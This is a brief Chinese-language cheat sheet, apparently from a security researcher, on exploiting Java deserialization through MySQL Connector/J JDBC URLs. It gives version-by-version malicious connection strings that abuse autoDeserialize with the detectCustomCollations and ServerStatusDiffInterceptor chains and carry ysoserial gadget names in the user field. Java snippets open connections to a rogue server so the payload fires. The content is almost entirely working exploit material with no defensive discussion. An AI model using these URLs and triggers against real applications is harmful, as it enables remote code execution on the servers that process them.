JDBC 反序列化

JDBC反序列化注入点在各版本中都存在于user参数处.
下面是相关概述:
detectCustomCollations链

• 5.1.19-5.1.28：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
• 5.1.29-5.1.48：jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
• 5.1.49：不可用
• 6.0.2-6.0.6：jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
• 8.x.x ：不可用
  ServerStatusDiffInterceptor链
• 5.1.0-5.1.10：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc  连接后需执行查询
• 5.1.11-5.x.xx：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
• 6.x：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc（包名中添加cj）
• 8.0.20以下：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc

detectCustomCollations

5.1.19~5.1.28

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&user=u0f139c";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);

5.1.19~5.1.40

String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=u0f139c";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);

6.0.2~6.0.6

String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=u0f139c";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);

ServerStatusDiffInterceptor

5.1.0~5.1.10

需要有执行数据库查询的语句才能触发.
然而测试没通.

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection(url,username,password);
String sql = "select database()";
PreparedStatement ps = conn.prepareStatement(sql);
//执行查询操作，返回的是数据库结果集的数据表
ResultSet resultSet = ps.executeQuery();

5.1.11~5.x.xx

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);

6.x

        String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);

8.0.7~8.0.20

        String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
        String username = "root";
        String password = "root";
        Class.forName("com.mysql.jdbc.Driver");
        DriverManager.getConnection(url,username,password);